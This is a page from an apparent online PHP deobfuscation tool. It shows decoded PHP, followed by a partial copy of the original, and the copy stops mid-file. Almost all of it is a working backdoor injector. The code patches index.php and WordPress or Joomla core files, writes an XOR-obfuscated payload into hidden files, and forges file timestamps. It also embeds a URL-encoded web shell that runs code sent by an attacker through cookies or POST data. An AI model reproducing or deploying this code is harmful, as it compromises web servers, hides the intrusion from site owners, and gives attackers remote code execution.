Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php srand(time()); class Obfuscator { private $_orig_script = ""; pr..
Decoded Output download
<?php
srand(time());
class Obfuscator
{
private $_orig_script = "";
private $_stub = <<<'TTT'
function find_self($encoder)
{
$key = preg_replace($encoder("%2F%5C%28.%2A%24%2F"), '', __FILE__);
$key = trim($key);
$encoder = substr($encoder, 0);
$key = basename($key);
return $key;
}
function myxor($aaaa, $bbbb)
{
return $aaaa ^ $bbbb;
}
function myunpack()
{
return pack('H*', '$rand2_rawurldecode');
}
$encoder = myxor('$rand1_rawurldecode', myunpack());
[PAYLOAD]
$data = $encoder($data);
function find_key($encoder, $data)
{
$key = find_self($encoder);
$chunks = strlen($data)/strlen($key);
$gamma = str_repeat($key, $chunks + 1);
$ykey = substr($gamma, 0, strlen($data));
return $ykey;
}
$ykey = find_key($encoder, $data);
$data=myxor($data, $ykey);
eval($data);
TTT;
static public function rand_str($min, $max)
{
$length = rand($min, $max);
return substr(str_shuffle(str_repeat($x = '0123456789abcdefghijklmnopqrstuvwxyz', ceil($length / strlen($x)))), 1, $length);
}
public function __construct($script)
{
$this->_orig_script = $script;
}
public function generate($key)
{
$stub = $this->_gen_stub();
$data = $this->_encode_payload($key);
$rand1_rawurldecode = Obfuscator::rand_str(strlen("rawurldecode"), strlen("rawurldecode"));
$rand2_rawurldecode = "rawurldecode" ^ $rand1_rawurldecode;
$rand2_rawurldecode = bin2hex($rand2_rawurldecode);
$stub = str_replace("\$rand2_rawurldecode", $rand2_rawurldecode, $stub);
$stub = str_replace("\$rand1_rawurldecode", $rand1_rawurldecode, $stub);
$chunks = str_split($data, 76);
$data = "\$data = \"\";
";
foreach ($chunks as $chunk)
{
$data .= "\$data .= \"" . rawurlencode($chunk) . "\";
";
}
$data .= "
";
$search = array("\$key", "\$data", "\$encoder", "\$ykey", "\$ekey", "\$aaaa", "\$bbbb", "\$gamma", "find_self", "myxor", "find_key", "myevl", "myunpack");
$replace = array("\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7));
$stub = str_replace("[PAYLOAD]", $data, $stub);
$stub = str_replace("[SPACE]", str_repeat(" ", rand(0, 7)), $stub);
$stub = str_replace($search, $replace, $stub);
return $stub;
}
private function _gen_stub()
{
$stub = $this->_stub;
function replacer35354($match)
{
$match = $match[0];
if (rand(0, 1))
{
$str1 = "/*" . Obfuscator::rand_str(1, 5) . "*/";
}
else
{
$str1 = "";
}
if (rand(0, 1))
{
$str1 .= " ";
}
if (rand(0, 1))
{
$str2 = "/*" . Obfuscator::rand_str(1, 5) . "*/";
}
else
{
$str2 = "";
}
if (rand(0, 1))
{
$str2 .= " ";
}
return $str1 . $match . $str2;
}
$stub = preg_replace_callback('|\(|', 'replacer35354', $stub);
$stub = preg_replace_callback('|\)|', 'replacer35354', $stub);
return $stub;
}
private function _encode_payload($key)
{
$key = substr(str_repeat($key, (strlen($this->_orig_script) / strlen($key)) + 1), 0, strlen($this->_orig_script));
return $this->_orig_script ^ $key;
}
}
class DomainFramer2
{
private $_path_cands = array();
private $_path_cands2 = array();
private $_cscript_payload = "";
private $_current_cscript_path = "";
private $_cscripts = array();
private $_cscripts_include = array();
private $_cscripts_patched = array();
private $_last_error = "";
public function __construct($backdoor_payload)
{
$this->_cscript_payload = $backdoor_payload;
}
public function find_paths()
{
$docroot = DomainFramer2::get_docroot();
$this->_path_cands[] = $docroot;
$this->_path_cands = array_merge($this->_path_cands, DomainFramer2::walk_dir($docroot, 1, $skip_files = TRUE, $skip_dirs = FALSE));
$this->_path_cands = array_unique($this->_path_cands);
function csort($a, $b)
{
return strlen($a) - strlen($b);
}
function match_exclude_list($path)
{
$docroot = DomainFramer2::get_docroot();
$path = substr($path, strlen($docroot));
$exclude = array("font", "css", "library", "vendor", "core", "upload", "view", "controller", "style", "image", "quarantine", "tmp", "tmb", "misc", "themes", "wp-content", "wp-admin", "wp-includes", "administrator", "cache", "components", "images", "includes", "language", "libraries", "media", "modules", "plugins", "templates", "well-known");
foreach ($exclude as $exclude_item) {
if (strpos($path, $exclude_item) !== FALSE) {
return FALSE;
}
}
return TRUE;
}
$this->_path_cands = array_filter($this->_path_cands, "match_exclude_list");
usort($this->_path_cands, 'csort'); # from shortest path to longest
}
public function preprocess_paths()
{
foreach ($this->_path_cands as $path) {
if ($this->_preprocess_one($path)) {
$this->_path_cands2[] = $path;
}
}
}
public function process($force_inject = FALSE)
{
foreach ($this->_path_cands2 as $path) {
$this->_last_error = "";
if ($this->_process_one($path, $force_inject)) {
$this->_cscripts[] = $path;
}
}
}
public function get_cscripts()
{
$cscripts = array();
$cscripts["include"] = array();
$cscripts["patch"] = array();
$host = $_SERVER["HTTP_HOST"];
foreach ($this->_cscripts as $current_path) {
if (in_array($current_path, $this->_cscripts_include)) {
$cscripts["include"][] = "http://" . $host . "/" . substr($current_path, strlen(DomainFramer2::get_docroot()) + 1);
} else {
$cscripts["patch"][] = "http://" . $host . "/" . substr($current_path, strlen(DomainFramer2::get_docroot()) + 1);
}
}
return $cscripts;
}
private function _process_one($path, $force_inject = FALSE)
{
$res = $this->_patch_index($path, $force_inject);
$res |= $this->_patch_cms($path, $force_inject);
if ($res) {
return TRUE;
} else {
return FALSE;
}
}
private function _try_create_index($index_php)
{
@file_put_contents($index_php, "<" . "?php
");
$content = @file_get_contents($index_php);
if (strpos($content, "php") !== FALSE) {
DomainFramer2::fix_rights($index_php);
$this->_last_error = "index created";
return TRUE;
} else {
return FALSE;
}
}
private function _preprocess_one($path)
{
if (!@file_exists($path)) {
return FALSE;
}
$index_html = $path . "/" . "index.html";
$index_htm = $path . "/" . "index.htm";
$index_php = $path . "/" . "index.php";
$htaccess = $path . "/" . ".htaccess";
if (!@file_exists($index_php) && !@file_exists($index_html) && !@file_exists($index_htm) && !@file_exists($htaccess)) {
$this->_last_error = "no index";
return $this->_try_create_index($index_php);
}
DomainFramer2::fix_rights($path);
DomainFramer2::fix_rights($index_html);
DomainFramer2::fix_rights($index_htm);
DomainFramer2::fix_rights($index_php);
if (@file_exists($index_php)) {
if (@file_exists($index_html)) @rename($index_html, $index_html . ".bak.bak");
if (@file_exists($index_htm)) @rename($index_htm, $index_htm . ".bak.bak");
} else if (@file_exists($index_html)) {
@rename($index_html, $index_html . ".bak.bak");
@file_put_contents($index_php, "<" . "?php
echo @file_get_contents('index.html.bak.bak');");
if (@file_exists($index_htm)) @rename($index_htm, $index_htm . ".bak.bak");
} else if (@file_exists($index_htm)) {
@rename($index_htm, $index_htm . ".bak.bak");
@file_put_contents($index_php, "<" . "?php
echo @file_get_contents('index.htm.bak.bak');");
} else {
@file_put_contents($index_php, "<" . "?php
");
}
return $this->_fix_index_php($index_php);
}
private function _fix_index_php($path)
{
if (@file_exists($path)) {
$index_php_content = @file_get_contents($path);
if (stripos($index_php_content, "<" . "?php") !== FALSE) {
return TRUE;
} else {
$index_php_content = "<" . "?php
?" . ">
" . $index_php_content;
@file_put_contents($path, $index_php_content);
return TRUE;
}
}
return FALSE;
}
private function _dump_backdoor($root_dir)
{
if ($this->_current_cscript_path) {
return $this->_current_cscript_path;
}
$dirs = DomainFramer2::walk_dir($root_dir, $depth = 2, $skip_files = TRUE, $skip_dirs = FALSE);
$root_dir = "";
shuffle($dirs);
foreach ($dirs as $dir) {
if (@is_writable($dir)) {
$root_dir = $dir;
}
}
if (empty($root_dir))
{
$this->_current_cscript_path = "";
$this->_last_error = "no writable for payload";
return NULL;
}
DomainFramer2::fix_rights($root_dir);
$obfuscator = new Obfuscator(rawurldecode($this->_cscript_payload));
$name = "." . substr(md5(time()), 0, 8) . ".ccss";
$this->_current_cscript_path = $root_dir . "/" . $name;
$cscript_file_content = "<" . "?php" . "
" . $obfuscator->generate($name) . "
";
@file_put_contents($this->_current_cscript_path, $cscript_file_content);
DomainFramer2::fix_time($this->_current_cscript_path);
if (!@is_file($this->_current_cscript_path)) {
$this->_current_cscript_path = "";
$this->_last_error = "cant dump payload";
return NULL;
}
return $this->_current_cscript_path;
}
private function _patch_file($path, $root, $force_inject = FALSE, $recovery_mode = FALSE)
{
if (!@file_exists($path)) {
return FALSE;
}
$backdoor_path = $this->_dump_backdoor($root);
if (!empty($backdoor_path)) {
//$backdoor_path = $backdoor_path
$dict = str_split("hmepulic");
$sym = $dict[array_rand($dict)];
$backdoor_path = str_replace("-", "\x" . dechex(ord("-")), $backdoor_path);
$backdoor_path = str_replace($sym, "\x" . dechex(ord($sym)), $backdoor_path);
$patch = "
\$path = \"" . $backdoor_path . "\"; ";
$patch .= "\$apath = str_repeat(\$path, 1); ";
$patch .= sprintf("@include_once /* %s */ (\$apath);
", Obfuscator::rand_str(1, 5));
$patch = str_replace("\$path", "\$r" . Obfuscator::rand_str(1, 5), $patch);
$patch = str_replace("\$apath", "\$t" . Obfuscator::rand_str(1, 5), $patch);
$this->_cscripts_include[] = $root;
} else // cant dump backdoor, probable no writable dirs
{
// try patch full backdoor content
$patch = DomainFramer2::morph_php_str($this->_cscript_payload);
$this->_cscripts_patched[] = $root;
}
$res = DomainFramer2::insert_in_head($path, $patch, $force_inject, $recovery_mode);
if ($res === FALSE)
{
$this->_last_error = "unwritable for patch";
}
return $res;
}
private function _patch_index($path, $force_inject = FALSE)
{
$index_php = $path . "/" . "index.php";
return $this->_patch_file($index_php, $path, $force_inject);
}
private function _patch_cms($path, $force_inject = FALSE)
{
$index_php = $path . "/" . "index.php";
$index_php_content = @file_get_contents($index_php);
if (strpos($index_php_content, "wp-blog-header.php") > 0) {
$inject_file_cands = array($path . "/" . "wp-settings.php", $path . "/" . "wp-config.php", $path . "/" . "wp-includes/load.php", $path . "/" . "wp-content/plugins/akismet/akismet.php");
} elseif (strpos($index_php_content, "_JEXEC") > 0) {
$inject_file_cands = array($path . "/" . "libraries/import.php", $path . "/" . "includes/framework.php",);
} else {
$inject_file_cands = array();
}
if (!count($inject_file_cands)) {
return FALSE;
}
shuffle($inject_file_cands);
$status = FALSE;
$inject_file_cand = "";
for ($i = 0; $i < count($inject_file_cands); $i++) {
$inject_file_cand = $inject_file_cands[$i];
DomainFramer2::fix_rights($inject_file_cand);
if (@is_writable($inject_file_cand)) {
$status |= $this->_patch_file($inject_file_cand, $path, $force_inject, $status);
}
}
if (empty($inject_file_cand))
{
return FALSE;
}
return $status;
}
static public function walk_dir($dir, $depth = 0, $skip_files = FALSE, $skip_dirs = TRUE)
{
if ($depth < 0) {
return array();
}
$result = array();
if (($h = @opendir($dir)) === FALSE) {
return $result;
}
while (($f = @readdir($h)) !== FALSE) {
if ($f == '.' || $f == '..') {
continue;
}
$current_file = "$dir/$f";
if (@is_dir($current_file)) {
if (!$skip_dirs) {
$result[] = $current_file;
}
$result = array_merge($result, DomainFramer2::walk_dir($current_file, $depth - 1, $skip_files, $skip_dirs));
} else {
if (!$skip_files) {
$result[] = $current_file;
}
}
}
@closedir($h);
return $result;
}
static public function fix_rights($path)
{
@chmod($path, 0755);
}
static public function fix_time($path, $tm=-1)
{
if ($tm == -1)
{
@touch($path, time() - mt_rand(60 * 60 * 24 * 30, 60 * 60 * 24 * 365));
}
else
{
@touch($path, $tm);
}
}
static public function get_docroot()
{
$request_uri = "";
$docroot = "";
if (strpos($_SERVER['REQUEST_URI'], "?") !== FALSE) {
$request_uri = explode("?", $_SERVER['REQUEST_URI']);
$request_uri = $request_uri[0];
} else {
$request_uri = $_SERVER['REQUEST_URI'];
}
$docroot_end = strrpos($_SERVER['SCRIPT_FILENAME'], $request_uri);
if ($docroot_end === FALSE) {
$docroot = $_SERVER['DOCUMENT_ROOT'];
} elseif ($docroot_end === 0) {
return "/";
} else {
$docroot = substr($_SERVER['SCRIPT_FILENAME'], 0, $docroot_end);
}
return str_replace("\", "/", $docroot);
}
static public function morph_str($string)
{
$hex = '';
$module = rand(2, 5);
for ($i = 0; $i < strlen($string); $i++) {
if (($i % $module) == 0 && $string[$i] != "\" && $string[$i] != "\"") {
$code = decoct(ord($string[$i]));
$hex .= "\\" . (strlen($code) == 3 ? $code : "0" . $code);
} else {
$hex .= $string[$i];
}
}
return $hex;
}
static public function gen_space_string($len)
{
$str = "";
for ($i = 0; $i < $len; $i++) {
$str .= " ";
}
return $str;
}
static public function morph_php_str($string)
{
$assert_parameter_name = "\$user_auth_cookie";
$assert_payload = DomainFramer2::morph_str('eval(rawurldecode(\"' . $string . '\"));');
$initial_line = DomainFramer2::gen_space_string(256) . $assert_parameter_name . ' = "' . $assert_payload . '";' . "
";
return $initial_line . "eval(" . $assert_parameter_name . ");";
}
static public function insert_in_head($path, $php_code, $force_inject = FALSE, $recovery_mode = FALSE)
{
DomainFramer2::fix_rights($path);
if (!@is_writable($path))
{
return FALSE;
}
$already_patched_marker = "/*" . substr(md5($path), 5, 5) . "*/";
$php_code = "
" . $already_patched_marker . "
" . $php_code . "
" . $already_patched_marker;
$content = @file_get_contents($path);
if (strpos($content, "schemas/sitemap/0.9") !== FALSE) {
return FALSE;
}
if (substr_count($content, $already_patched_marker) === 1) {
$content = str_replace($already_patched_marker, "", $content);
}
if ($recovery_mode && strpos($content, $already_patched_marker) === FALSE)
{
return FALSE;
}
if (strpos($content, $already_patched_marker) !== FALSE && $force_inject) {
$from = "/" . preg_quote($already_patched_marker, "/") . "[.\s\S]*" . preg_quote($already_patched_marker, "/") . "/";
$content = preg_replace($from, "", $content, 1);
}
$html_pos = stripos($content, "<" . "html");
$php_pos = stripos($content, "<" . "?php");
if ($html_pos === FALSE) {
$html_pos = strlen($content) + 1;
}
if ($php_pos === FALSE) {
$php_pos = strlen($content) + 1;
}
if ($php_pos < $html_pos) {
$from = "/" . preg_quote("<" . "?" . "php", "/") . "/";
$content = preg_replace($from, "<" . "?" . "php" . $php_code, $content, 1);
} else {
$content = "<" . "?php " . $php_code . "
?" . ">
" . $content;
}
@file_put_contents($path, $content);
DomainFramer2::fix_time($path, time() + 120);
$content = @file_get_contents($path);
if (strpos($content, $already_patched_marker) !== FALSE) {
return TRUE;
} else {
return FALSE;
}
}
public function last_error()
{
return $this->_last_error;
}
}
$framer = new DomainFramer2("if%20%28%21defined%28%27stream_context_create%20%27%29%29%0A%7B%0Adefine%28%27stream_context_create%20%27%2C%201%29%3B%0A%40ini_set%28%27error_log%27%2C%20NULL%29%3B%40ini_set%28%27log_errors%27%2C%200%29%3B%40ini_set%28%27max_execution_time%27%2C%200%29%3B%40error_reporting%280%29%3B%40set_time_limit%280%29%3Bif%28%21defined%28%22PHP_EOL%22%29%29%7Bdefine%28%22PHP_EOL%22%2C%20%22%5Cn%22%29%3B%7Dif%20%28%21defined%28%27file_put_contents%20%27%29%29%7Bdefine%28%27file_put_contents%20%27%2C%201%29%3B%24ukwfik%20%3D%20%27acd14c4d-9a35-4b6f-b40f-ad76c9c8040f%27%3Bglobal%20%24ukwfik%3Bfunction%20xzpkqd%28%24vfpapv%29%20%7Bif%20%28strlen%28%24vfpapv%29%20%3C%204%29%7Breturn%20%22%22%3B%7D%24auleptmm%20%3D%20%22ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789%2B/%3D%22%3B%24smgnwvjz%20%3D%20str_split%28%24auleptmm%29%3B%24smgnwvjz%20%3D%20array_flip%28%24smgnwvjz%29%3B%24ukonchp%20%3D%200%3B%24vvwyxfyx%20%3D%20%22%22%3B%24vfpapv%20%3D%20preg_replace%28%22%7E%5B%5EA-Za-z0-9%5C%2B%5C/%5C%3D%5D%7E%22%2C%20%22%22%2C%20%24vfpapv%29%3Bdo%20%7B%24hcybkhvd%20%3D%20%24smgnwvjz%5B%24vfpapv%5B%24ukonchp%2B%2B%5D%5D%3B%24wpeeeyt%20%3D%20%24smgnwvjz%5B%24vfpapv%5B%24ukonchp%2B%2B%5D%5D%3B%24gkzbzq%20%3D%20%24smgnwvjz%5B%24vfpapv%5B%24ukonchp%2B%2B%5D%5D%3B%24stjwqzxf%20%3D%20%24smgnwvjz%5B%24vfpapv%5B%24ukonchp%2B%2B%5D%5D%3B%24kgiqbylxuwgmizz%20%3D%20%28%24hcybkhvd%20%3C%3C%202%29%20%7C%20%28%24wpeeeyt%20%3E%3E%204%29%3B%24zqtjtw%20%3D%20%28%28%24wpeeeyt%20%26%2015%29%20%3C%3C%204%29%20%7C%20%28%24gkzbzq%20%3E%3E%202%29%3B%24rxspesu%20%3D%20%28%28%24gkzbzq%20%26%203%29%20%3C%3C%206%29%20%7C%20%24stjwqzxf%3B%24vvwyxfyx%20%3D%20%24vvwyxfyx%20.%20chr%28%24kgiqbylxuwgmizz%29%3Bif%20%28%24gkzbzq%20%21%3D%2064%29%20%7B%24vvwyxfyx%20%3D%20%24vvwyxfyx%20.%20chr%28%24zqtjtw%29%3B%7Dif%20%28%24stjwqzxf%20%21%3D%2064%29%20%7B%24vvwyxfyx%20%3D%20%24vvwyxfyx%20.%20chr%28%24rxspesu%29%3B%7D%7D%20while%20%28%24ukonchp%20%3C%20strlen%28%24vfpapv%29%29%3Breturn%20%24vvwyxfyx%3B%7Dif%20%28%21function_exists%28%27file_put_contents%27%29%29%7Bfunction%20file_put_contents%28%24kgiqbylx%2C%20%24mplisjs%2C%20%24tzzlkdqu%20%3D%20False%29%7B%24mplisjsxfduvsk%20%3D%20%24tzzlkdqu%20%3D%3D%208%20%3F%20%27a%27%20%3A%20%27w%27%3B%24ycesld%20%3D%20%40fopen%28%24kgiqbylx%2C%20%24mplisjsxfduvsk%29%3Bif%20%28%24ycesld%20%3D%3D%3D%20False%29%7Breturn%200%3B%7Delse%7Bif%20%28is_array%28%24mplisjs%29%29%20%24mplisjs%20%3D%20implode%28%24mplisjs%29%3B%24wnosluwxalmvh%20%3D%20fwrite%28%24ycesld%2C%20%24mplisjs%29%3Bfclose%28%24ycesld%29%3Breturn%20%24wnosluwxalmvh%3B%7D%7D%7Dif%20%28%21function_exists%28%27file_get_contents%27%29%29%7Bfunction%20file_get_contents%28%24rjlsnfpf%29%7B%24kzseft%20%3D%20fopen%28%24rjlsnfpf%2C%20%22r%22%29%3B%24valusqf%20%3D%20fread%28%24kzseft%2C%20filesize%28%24rjlsnfpf%29%29%3Bfclose%28%24kzseft%29%3Breturn%20%24valusqf%3B%7D%7Dfunction%20encaioa%28%29%7Breturn%20trim%28preg_replace%28%22/%5C%28.%2A%5C%24/%22%2C%20%27%27%2C%20__FILE__%29%29%3B%7Dfunction%20skghtt%28%24uwucjfg%2C%20%24yjkllsil%29%7B%24xmfrdomo%20%3D%20%22%22%3Bfor%20%28%24ukonchp%3D0%3B%20%24ukonchp%3Cstrlen%28%24uwucjfg%29%3B%29%7Bfor%20%28%24wnosluw%3D0%3B%20%24wnosluw%3Cstrlen%28%24yjkllsil%29%20%26%26%20%24ukonchp%3Cstrlen%28%24uwucjfg%29%3B%20%24wnosluw%2B%2B%2C%20%24ukonchp%2B%2B%29%7B%24xmfrdomo%20.%3D%20chr%28ord%28%24uwucjfg%5B%24ukonchp%5D%29%20%5E%20ord%28%24yjkllsil%5B%24wnosluw%5D%29%29%3B%7D%7Dreturn%20%24xmfrdomo%3B%7Dfunction%20arcnll%28%24uwucjfg%2C%20%24yjkllsil%29%7Bglobal%20%24ukwfik%3Breturn%20skghtt%28skghtt%28%24uwucjfg%2C%20%24yjkllsil%29%2C%20%24ukwfik%29%3B%7Dfunction%20banwrr%28%24uwucjfg%2C%20%24yjkllsil%29%7Bglobal%20%24ukwfik%3Breturn%20skghtt%28skghtt%28%24uwucjfg%2C%20%24ukwfik%29%2C%20%24yjkllsil%29%3B%7Dfunction%20noibksfb%28%29%7B%24qwcgalds%20%3D%20%40file_get_contents%28encaioa%28%29%29%3B%24ytcijln%20%3D%20strpos%28%24qwcgalds%2C%20md5%28encaioa%28%29%29%29%3Bif%20%28%24ytcijln%20%21%3D%3D%20FALSE%29%7B%24cpqiumbe%20%3D%20substr%28%24qwcgalds%2C%20%24ytcijln%20%2B%2032%29%3B%24hpcupip%20%3D%20%40unserialize%28arcnll%28rawurldecode%28%24cpqiumbe%29%2C%20md5%28encaioa%28%29%29%29%29%3B%7Delse%7B%24hpcupip%20%3D%20Array%28%29%3B%7Dreturn%20%24hpcupip%3B%7Dfunction%20igmddlhx%28%24hpcupip%29%7B%24etoboxnk%20%3D%20rawurlencode%28banwrr%28%40serialize%28%24hpcupip%29%2C%20md5%28encaioa%28%29%29%29%29%3B%24qwcgalds%20%3D%20%40file_get_contents%28encaioa%28%29%29%3B%24ytcijln%20%3D%20strpos%28%24qwcgalds%2C%20md5%28encaioa%28%29%29%29%3Bif%20%28%24ytcijln%20%21%3D%3D%20FALSE%29%7B%24bgnxkqjs%20%3D%20substr%28%24qwcgalds%2C%20%24ytcijln%20%2B%2032%29%3B%24qwcgalds%20%3D%20str_replace%28%24bgnxkqjs%2C%20%24etoboxnk%2C%20%24qwcgalds%29%3B%7Delse%7B%24qwcgalds%20%3D%20%24qwcgalds%20.%20%22%5Cn%5Cn//%22%20.%20md5%28encaioa%28%29%29%20.%20%24etoboxnk%3B%7D%40file_put_contents%28encaioa%28%29%2C%20%24qwcgalds%29%3B%7Dfunction%20wndfcdt%28%24uetgil%2C%20%24ukjayigb%29%7B%24hpcupip%20%3D%20noibksfb%28%29%3B%24hpcupip%5B%24uetgil%5D%20%3D%20xzpkqd%28%24ukjayigb%29%3Bigmddlhx%28%24hpcupip%29%3B%7Dfunction%20tnfqcb%28%24uetgil%29%7B%24hpcupip%20%3D%20noibksfb%28%29%3Bunset%28%24hpcupip%5B%24uetgil%5D%29%3Bigmddlhx%28%24hpcupip%29%3B%7Dfunction%20ielcyedg%28%24uetgil%3DNULL%29%7Bforeach%20%28noibksfb%28%29%20as%20%24hhghxqti%3D%3E%24yflueda%29%7Bif%20%28%24uetgil%29%7Bif%20%28strcmp%28%24uetgil%2C%20%24hhghxqti%29%20%3D%3D%200%29%7Beval%28%24yflueda%29%3Bbreak%3B%7D%7Delse%7Beval%28%24yflueda%29%3B%7D%7D%7Dforeach%20%28array_merge%28%24_COOKIE%2C%20%24_POST%29%20as%20%24txsyjapp%20%3D%3E%20%24uwucjfg%29%7B%24uwucjfg%20%3D%20%40unserialize%28arcnll%28xzpkqd%28%24uwucjfg%29%2C%20%24txsyjapp%29%29%3Bif%20%28isset%28%24uwucjfg%5B%27ak%27%5D%29%20%26%26%20%24ukwfik%3D%3D%24uwucjfg%5B%27ak%27%5D%29%7Bif%20%28%24uwucjfg%5B%27a%27%5D%20%3D%3D%20%27i%27%29%7B%24ukonchp%20%3D%20Array%28%27pv%27%20%3D%3E%20%40phpversion%28%29%2C%27sv%27%20%3D%3E%20%272.0-1%27%2C%27ak%27%20%3D%3E%20%24uwucjfg%5B%27ak%27%5D%2C%29%3Becho%20%40serialize%28%24ukonchp%29%3Bexit%3B%7Delseif%20%28%24uwucjfg%5B%27a%27%5D%20%3D%3D%20%27e%27%29%7Beval%28%24uwucjfg%5B%27d%27%5D%29%3B%7Delseif%20%28%24uwucjfg%5B%27a%27%5D%20%3D%3D%20%27plugin%27%29%7Bif%28%24uwucjfg%5B%27sa%27%5D%20%3D%3D%20%27add%27%29%7Bwndfcdt%28%24uwucjfg%5B%27p%27%5D%2C%20%24uwucjfg%5B%27d%27%5D%29%3B%7Delseif%28%24uwucjfg%5B%27sa%27%5D%20%3D%3D%20%27rem%27%29%7Btnfqcb%28%24uwucjfg%5B%27p%27%5D%29%3B%7D%7Decho%20%24uwucjfg%5B%27ak%27%5D%3Bexit%28%29%3B%7D%7Dielcyedg%28%29%3B%7D%0A%7D");
$framer->find_paths();
$framer->preprocess_paths();
$framer->process($force_inject = TRUE);
$cscripts = $framer->get_cscripts();
if (count($cscripts) == 0) {
@unlink($this->_current_cscript_path);
}
$cscripts["last_error"] = $framer->last_error();
echo @serialize($cscripts);
exit(); ?>Did this file decode correctly?
Original Code
<?php
srand(time());
class Obfuscator
{
private $_orig_script = "";
private $_stub = <<<'TTT'
function find_self($encoder)
{
$key = preg_replace($encoder("%2F%5C%28.%2A%24%2F"), '', __FILE__);
$key = trim($key);
$encoder = substr($encoder, 0);
$key = basename($key);
return $key;
}
function myxor($aaaa, $bbbb)
{
return $aaaa ^ $bbbb;
}
function myunpack()
{
return pack('H*', '$rand2_rawurldecode');
}
$encoder = myxor('$rand1_rawurldecode', myunpack());
[PAYLOAD]
$data = $encoder($data);
function find_key($encoder, $data)
{
$key = find_self($encoder);
$chunks = strlen($data)/strlen($key);
$gamma = str_repeat($key, $chunks + 1);
$ykey = substr($gamma, 0, strlen($data));
return $ykey;
}
$ykey = find_key($encoder, $data);
$data=myxor($data, $ykey);
eval($data);
TTT;
static public function rand_str($min, $max)
{
$length = rand($min, $max);
return substr(str_shuffle(str_repeat($x = '0123456789abcdefghijklmnopqrstuvwxyz', ceil($length / strlen($x)))), 1, $length);
}
public function __construct($script)
{
$this->_orig_script = $script;
}
public function generate($key)
{
$stub = $this->_gen_stub();
$data = $this->_encode_payload($key);
$rand1_rawurldecode = Obfuscator::rand_str(strlen("rawurldecode"), strlen("rawurldecode"));
$rand2_rawurldecode = "rawurldecode" ^ $rand1_rawurldecode;
$rand2_rawurldecode = bin2hex($rand2_rawurldecode);
$stub = str_replace("\$rand2_rawurldecode", $rand2_rawurldecode, $stub);
$stub = str_replace("\$rand1_rawurldecode", $rand1_rawurldecode, $stub);
$chunks = str_split($data, 76);
$data = "\$data = \"\";\n";
foreach ($chunks as $chunk)
{
$data .= "\$data .= \"" . rawurlencode($chunk) . "\";\n";
}
$data .= "\n";
$search = array("\$key", "\$data", "\$encoder", "\$ykey", "\$ekey", "\$aaaa", "\$bbbb", "\$gamma", "find_self", "myxor", "find_key", "myevl", "myunpack");
$replace = array("\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"\$o" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7),
"_" . Obfuscator::rand_str(5, 7));
$stub = str_replace("[PAYLOAD]", $data, $stub);
$stub = str_replace("[SPACE]", str_repeat(" ", rand(0, 7)), $stub);
$stub = str_replace($search, $replace, $stub);
return $stub;
}
private function _gen_stub()
{
$stub = $this->_stub;
function replacer35354($match)
{
$match = $match[0];
if (rand(0, 1))
{
$str1 = "/*" . Obfuscator::rand_str(1, 5) . "*/";
}
else
{
$str1 = "";
}
if (rand(0, 1))
{
$str1 .= " ";
}
if (rand(0, 1))
{
$str2 = "/*" . Obfuscator::rand_str(1, 5) . "*/";
}
else
{
$str2 = "";
}
if (rand(0, 1))
{
$str2 .= " ";
}
return $str1 . $match . $str2;
}
$stub = preg_replace_callback('|\(|', 'replacer35354', $stub);
$stub = preg_replace_callback('|\)|', 'replacer35354', $stub);
return $stub;
}
private function _encode_payload($key)
{
$key = substr(str_repeat($key, (strlen($this->_orig_script) / strlen($key)) + 1), 0, strlen($this->_orig_script));
return $this->_orig_script ^ $key;
}
}
class DomainFramer2
{
private $_path_cands = array();
private $_path_cands2 = array();
private $_cscript_payload = "";
private $_current_cscript_path = "";
private $_cscripts = array();
private $_cscripts_include = array();
private $_cscripts_patched = array();
private $_last_error = "";
public function __construct($backdoor_payload)
{
$this->_cscript_payload = $backdoor_payload;
}
public function find_paths()
{
$docroot = DomainFramer2::get_docroot();
$this->_path_cands[] = $docroot;
$this->_path_cands = array_merge($this->_path_cands, DomainFramer2::walk_dir($docroot, 1, $skip_files = TRUE, $skip_dirs = FALSE));
$this->_path_cands = array_unique($this->_path_cands);
function csort($a, $b)
{
return strlen($a) - strlen($b);
}
function match_exclude_list($path)
{
$docroot = DomainFramer2::get_docroot();
$path = substr($path, strlen($docroot));
$exclude = array("font", "css", "library", "vendor", "core", "upload", "view", "controller", "style", "image", "quarantine", "tmp", "tmb", "misc", "themes", "wp-content", "wp-admin", "wp-includes", "administrator", "cache", "components", "images", "includes", "language", "libraries", "media", "modules", "plugins", "templates", "well-known");
foreach ($exclude as $exclude_item) {
if (strpos($path, $exclude_item) !== FALSE) {
return FALSE;
}
}
return TRUE;
}
$this->_path_cands = array_filter($this->_path_cands, "match_exclude_list");
usort($this->_path_cands, 'csort'); # from shortest path to longest
}
public function preprocess_paths()
{
foreach ($this->_path_cands as $path) {
if ($this->_preprocess_one($path)) {
$this->_path_cands2[] = $path;
}
}
}
public function process($force_inject = FALSE)
{
foreach ($this->_path_cands2 as $path) {
$this->_last_error = "";
if ($this->_process_one($path, $force_inject)) {
$this->_cscripts[] = $path;
}
}
}
public function get_cscripts()
{
$cscripts = array();
$cscripts["include"] = array();
$cscripts["patch"] = array();
$host = $_SERVER["HTTP_HOST"];
foreach ($this->_cscripts as $current_path) {
if (in_array($current_path, $this->_cscripts_include)) {
$cscripts["include"][] = "http://" . $host . "/" . substr($current_path, strlen(DomainFramer2::get_docroot()) + 1);
} else {
